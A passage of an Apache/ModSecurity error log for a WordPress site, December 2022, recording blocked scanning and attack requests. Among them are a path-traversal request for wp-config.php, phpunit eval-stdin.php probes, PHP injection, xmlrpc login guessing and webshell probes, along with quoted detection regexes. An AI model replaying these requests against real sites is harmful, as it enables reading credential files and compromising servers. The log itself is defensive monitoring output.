"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5TXqhRZUcAS-3_glfiz5gAAAJM"] [Sun Dec 11 06:50:46.663839 2022] [autoindex:error] [pid 15537:tid 139841601771264] [client 51.159.37.26:46546] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 11 16:42:33.030463 2022] [autoindex:error] [pid 14999:tid 139841643734784] [client 170.106.148.14:38416] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 12 13:03:36.699846 2022] [autoindex:error] [pid 5936:tid 140210557912832] [client 170.106.196.181:35514] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 12 18:29:40.036645 2022] [:error] [pid 6110:tid 140210549520128] [client 5.188.62.140:46200] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5e5ZHsRYclIJ3NZkIGl1AAAAMg"] [Tue Dec 13 11:09:26.504919 2022] [autoindex:error] [pid 7972:tid 140320582878976] [client 43.130.68.161:54812] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Dec 13 23:23:10.113963 2022] [:error] [pid 17717:tid 140320784668416] [client 5.188.62.26:35200] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5lPrtBJKFlL6PTUnUxpOwAAAAI"] [Wed Dec 14 07:19:37.663795 2022] [:error] [pid 21295:tid 140127040882432] [client 152.89.196.13:45090] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/system-reboot.php"] [unique_id "Y5m_WVMf1efyK5RmsSQL4AAAAFQ"] [Wed Dec 14 13:22:47.984111 2022] [:error] [pid 21295:tid 140127066060544] [client 152.89.196.13:55248] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-commentin.php"] [unique_id "Y5oUd1Mf1efyK5RmsSQNywAAAFE"] [Thu Dec 15 01:56:59.260122 2022] [autoindex:error] [pid 21960:tid 140127074453248] [client 43.153.19.101:34326] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 15 03:11:31.131653 2022] [:error] [pid 21296:tid 140127191951104] [client 157.230.151.110:36310] [client 157.230.151.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "Y5rWs9ZAyJPFuGfJdLgRdQAAAII"] [Thu Dec 15 06:29:41.758488 2022] [:error] [pid 27323:tid 139859989534464] [client 5.188.62.140:42440] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5sFJXDmKrQage27hRnwMwAAANc"] [Fri Dec 16 07:22:10.362166 2022] [:error] [pid 16806:tid 139747129210624] [client 213.152.162.89:43480] [client 213.152.162.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@admin# found within XML: \\x0a wp.getUsersBlogs\\x0a \\x0a admin\\x0a admin@@admin##\\x0a \\x0a "] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5xi8nhwt0qbRGCc7MstrwAAAJQ"] [Fri Dec 16 08:35:05.154092 2022] [:error] [pid 16806:tid 139747145996032] [client 37.19.198.141:45694] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5x0CXhwt0qbRGCc7MsuMwAAAJI"] [Fri Dec 16 08:35:05.214864 2022] [:error] [pid 17447:tid 139747104032512] [client 37.19.198.141:45696] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Y5x0Cf6kDDXIYUJnoFxNmQAAANc"] [Fri Dec 16 08:35:05.274941 2022] [:error] [pid 17447:tid 139747095639808] [client 37.19.198.141:45698] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5x0Cf6kDDXIYUJnoFxNmgAAANg"] [Fri Dec 16 08:35:06.344175 2022] [:error] [pid 17447:tid 139747255101184] [client 37.19.198.141:45702] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/contacto/"] [unique_id "Y5x0Cv6kDDXIYUJnoFxNmwAAAMU"] [Fri Dec 16 08:35:06.411297 2022] [:error] [pid 17447:tid 139747297064704] [client 37.19.198.141:45704] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5x0Cv6kDDXIYUJnoFxNnAAAAMA"] [Fri Dec 16 08:35:07.464214 2022] [:error] [pid 16805:tid 139747196352256] [client 37.19.198.141:45708] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Y5x0C7rG9X2BVRtvPZlATQAAAEw"] [Fri Dec 16 08:35:07.482676 2022] [:error] [pid 16806:tid 139747137603328] [client 37.19.198.141:45710] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5x0C3hwt0qbRGCc7MsuNQAAAJM"] [Fri Dec 16 08:35:07.519843 2022] [:error] [pid 16804:tid 139747204744960] [client 37.19.198.141:45712] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Y5x0C9pjIwa3iT110JarqgAAAAs"] [Fri Dec 16 08:35:07.538105 2022] [:error] [pid 17447:tid 139747271886592] [client 37.19.198.141:45714] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5x0C_6kDDXIYUJnoFxNngAAAMM"] [Fri Dec 16 08:35:08.600135 2022] [:error] [pid 16806:tid 139747154388736] [client 37.19.198.141:45718] [client 37.19.198.141] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Y5x0DHhwt0qbRGCc7MsuNgAAAJE"] [Fri Dec 16 08:44:12.773824 2022] [autoindex:error] [pid 16805:tid 139747162781440] [client 43.153.13.227:46028] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Dec 17 09:44:27.563778 2022] [:error] [pid 1655:tid 139980995274496] [client 128.199.81.122:33016] [client 128.199.81.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y53Vy61yuGwnCcWmgp2WiwAAAIs"] [Sat Dec 17 09:44:27.582290 2022] [:error] [pid 1649:tid 139981154191104] [client 128.199.81.122:33018] [client 128.199.81.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y53Vy5eMkYz3SnFO7xR6dAAAAAE"] [Sat Dec 17 14:17:05.302692 2022] [:error] [pid 1655:tid 139980886169344] [client 5.188.62.26:44344] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y54Vsa1yuGwnCcWmgp2aTAAAAJg"] [Sat Dec 17 20:36:53.425196 2022] [:error] [pid 2308:tid 139981145798400] [client 5.188.62.140:58078] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y55utWbUmJQzUI7J5EkbVQAAAMI"] [Sun Dec 18 04:53:13.507007 2022] [:error] [pid 26515:tid 139874971596544] [client 5.188.62.76:45726] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y57jCQSd1skEZa6dlfAbpAAAANc"] [Sun Dec 18 09:32:55.111803 2022] [autoindex:error] [pid 26515:tid 139875089094400] [client 85.31.44.203:59362] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 18 09:33:07.489013 2022] [autoindex:error] [pid 26515:tid 139874979989248] [client 85.31.44.203:59366] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 18 21:14:08.140874 2022] [:error] [pid 2192:tid 139875122665216] [client 18.130.75.127:59606] [client 18.130.75.127] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y5_I8BuXq11nTeyyekIvbAAAAMU"] [Mon Dec 19 01:20:09.931565 2022] [:error] [pid 7368:tid 139757019424512] [client 45.55.197.84:35382] [client 45.55.197.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: 